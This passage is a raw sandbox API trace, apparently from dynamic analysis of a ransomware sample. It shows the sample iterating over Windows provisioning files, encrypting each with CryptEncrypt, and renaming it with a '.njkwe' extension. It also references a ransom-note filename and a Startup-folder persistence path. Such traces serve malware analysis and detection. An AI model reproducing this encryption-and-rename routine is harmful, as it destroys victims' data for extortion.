hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0080.593] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910bc9cd, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x910bc9cd, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x910bc9cd, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x287, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="465__Connections_Cellular_Utel INET (Ukraine)_i0$(__MVID)@WAP.provxml", cAlternateFileName="465__C~1.PRO")) returned 1 [0080.593] lstrcmpiW (lpString1="465__Connections_Cellular_Utel INET (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0080.593] lstrcmpiW (lpString1="465__Connections_Cellular_Utel INET (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0080.593] lstrcmpiW (lpString1="465__Connections_Cellular_Utel INET (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0080.593] lstrcmpiW (lpString1="465__Connections_Cellular_Utel INET (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0080.593] lstrcmpiW (lpString1="465__Connections_Cellular_Utel INET (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0080.593] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\465__Connections_Cellular_Utel INET (Ukraine)_i0$(__MVID)@WAP.provxml") returned 163 [0080.593] StrStrIW (lpFirst="465__Connections_Cellular_Utel INET (Ukraine)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0080.593] lstrcmpW (lpString1="465__Connections_Cellular_Utel INET (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0080.593] lstrcmpW (lpString1="465__Connections_Cellular_Utel INET (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0080.593] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\465__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0080.593] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\465__Connections_Cellular_Utel INET (Ukraine)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\465__connections_cellular_utel inet (ukraine)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0080.593] GetTickCount () returned 0x1154766 [0080.593] GetTickCount () returned 0x1154766 [0080.593] GetTickCount () returned 0x1154766 [0080.593] GetTickCount () returned 0x1154766 [0080.593] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0080.594] GetProcessHeap () returned 0xbe0000 [0080.594] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0080.594] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x287, lpOverlapped=0x0) returned 1 [0080.599] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd79, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.599] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x287, lpOverlapped=0x0) returned 1 [0080.599] GetProcessHeap () returned 0xbe0000 [0080.600] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0080.600] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.600] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0080.600] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0080.600] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0080.600] CloseHandle (hObject=0x43c) returned 1 [0080.600] GetProcessHeap () returned 0xbe0000 [0080.600] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0080.600] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\465__Connections_Cellular_Utel INET (Ukraine)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0080.600] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\465__Connections_Cellular_Utel INET (Ukraine)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\465__connections_cellular_utel inet (ukraine)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\465__Connections_Cellular_Utel INET (Ukraine)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\465__connections_cellular_utel inet (ukraine)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0080.601] GetProcessHeap () returned 0xbe0000 [0080.601] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0080.601] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910bc9cd, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x910bc9cd, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x910bc9cd, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2be, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="466__Connections_Cellular_du (United Arab Emirates)_i0$(__MVID)@WAP.provxml", cAlternateFileName="466__C~1.PRO")) returned 1 [0080.601] lstrcmpiW (lpString1="466__Connections_Cellular_du (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0080.601] lstrcmpiW (lpString1="466__Connections_Cellular_du (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0080.601] lstrcmpiW (lpString1="466__Connections_Cellular_du (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0080.601] lstrcmpiW (lpString1="466__Connections_Cellular_du (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0080.601] lstrcmpiW (lpString1="466__Connections_Cellular_du (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0080.601] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\466__Connections_Cellular_du (United Arab Emirates)_i0$(__MVID)@WAP.provxml") returned 169 [0080.601] StrStrIW (lpFirst="466__Connections_Cellular_du (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0080.601] lstrcmpW (lpString1="466__Connections_Cellular_du (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0080.601] lstrcmpW (lpString1="466__Connections_Cellular_du (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0080.601] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\466__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0080.601] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\466__Connections_Cellular_du (United Arab Emirates)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\466__connections_cellular_du (united arab emirates)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0080.602] GetTickCount () returned 0x1154775 [0080.602] GetTickCount () returned 0x1154775 [0080.602] GetTickCount () returned 0x1154775 [0080.602] GetTickCount () returned 0x1154775 [0080.602] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0080.602] GetProcessHeap () returned 0xbe0000 [0080.602] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0080.602] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2be, lpOverlapped=0x0) returned 1 [0080.604] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd42, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.604] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2be, lpOverlapped=0x0) returned 1 [0080.604] GetProcessHeap () returned 0xbe0000 [0080.604] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0080.604] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.604] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0080.604] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0080.604] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0080.604] CloseHandle (hObject=0x43c) returned 1 [0080.604] GetProcessHeap () returned 0xbe0000 [0080.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0080.604] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\466__Connections_Cellular_du (United Arab Emirates)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 189 [0080.604] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\466__Connections_Cellular_du (United Arab Emirates)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\466__connections_cellular_du (united arab emirates)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\466__Connections_Cellular_du (United Arab Emirates)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\466__connections_cellular_du (united arab emirates)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0080.605] GetProcessHeap () returned 0xbe0000 [0080.605] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0080.605] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910e2c39, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x910e2c39, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x910e2c39, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="467__Connections_Cellular_du EITC (United Arab Emirates)_i0$(__MVID)@WAP.provxml", cAlternateFileName="467__C~1.PRO")) returned 1 [0080.605] lstrcmpiW (lpString1="467__Connections_Cellular_du EITC (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0080.605] lstrcmpiW (lpString1="467__Connections_Cellular_du EITC (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0080.605] lstrcmpiW (lpString1="467__Connections_Cellular_du EITC (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0080.605] lstrcmpiW (lpString1="467__Connections_Cellular_du EITC (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0080.605] lstrcmpiW (lpString1="467__Connections_Cellular_du EITC (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0080.605] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\467__Connections_Cellular_du EITC (United Arab Emirates)_i0$(__MVID)@WAP.provxml") returned 174 [0080.605] StrStrIW (lpFirst="467__Connections_Cellular_du EITC (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0080.605] lstrcmpW (lpString1="467__Connections_Cellular_du EITC (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0080.605] lstrcmpW (lpString1="467__Connections_Cellular_du EITC (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0080.605] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\467__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0080.605] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\467__Connections_Cellular_du EITC (United Arab Emirates)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\467__connections_cellular_du eitc (united arab emirates)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0080.606] GetTickCount () returned 0x1154775 [0080.606] GetTickCount () returned 0x1154775 [0080.606] GetTickCount () returned 0x1154775 [0080.606] GetTickCount () returned 0x1154775 [0080.606] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0080.606] GetProcessHeap () returned 0xbe0000 [0080.606] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0080.606] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x28a, lpOverlapped=0x0) returned 1 [0080.608] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.608] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x28a, lpOverlapped=0x0) returned 1 [0080.608] GetProcessHeap () returned 0xbe0000 [0080.608] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0080.608] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.608] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0080.608] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0080.608] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0080.608] CloseHandle (hObject=0x43c) returned 1 [0080.609] GetProcessHeap () returned 0xbe0000 [0080.609] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0080.609] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\467__Connections_Cellular_du EITC (United Arab Emirates)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 194 [0080.609] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\467__Connections_Cellular_du EITC (United Arab Emirates)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\467__connections_cellular_du eitc (united arab emirates)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\467__Connections_Cellular_du EITC (United Arab Emirates)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\467__connections_cellular_du eitc (united arab emirates)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0080.609] GetProcessHeap () returned 0xbe0000 [0080.609] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0080.609] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910e2c39, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x910e2c39, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x910e2c39, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x294, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="468__Connections_Cellular_Etisalat (United Arab Emirates)_i0$(__MVID)@WAP.provxml", cAlternateFileName="468__C~1.PRO")) returned 1 [0080.609] lstrcmpiW (lpString1="468__Connections_Cellular_Etisalat (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0080.609] lstrcmpiW (lpString1="468__Connections_Cellular_Etisalat (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0080.609] lstrcmpiW (lpString1="468__Connections_Cellular_Etisalat (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0080.610] lstrcmpiW (lpString1="468__Connections_Cellular_Etisalat (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0080.610] lstrcmpiW (lpString1="468__Connections_Cellular_Etisalat (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0080.610] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\468__Connections_Cellular_Etisalat (United Arab Emirates)_i0$(__MVID)@WAP.provxml") returned 175 [0080.610] StrStrIW (lpFirst="468__Connections_Cellular_Etisalat (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0080.610] lstrcmpW (lpString1="468__Connections_Cellular_Etisalat (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0080.610] lstrcmpW (lpString1="468__Connections_Cellular_Etisalat (United Arab Emirates)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0080.610] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\468__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0080.610] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\468__Connections_Cellular_Etisalat (United Arab Emirates)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\468__connections_cellular_etisalat (united arab emirates)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0080.649] GetTickCount () returned 0x11547a4 [0080.649] GetTickCount () returned 0x11547a4 [0080.649] GetTickCount () returned 0x11547a4 [0080.649] GetTickCount () returned 0x11547a4 [0080.649] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0080.649] GetProcessHeap () returned 0xbe0000 [0080.649] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0080.649] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x294, lpOverlapped=0x0) returned 1 [0080.697] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.697] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x294, lpOverlapped=0x0) returned 1 [0080.698] GetProcessHeap () returned 0xbe0000 [0080.698] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0080.698] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.698] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0080.698] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0080.698] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0080.698] CloseHandle (hObject=0x43c) 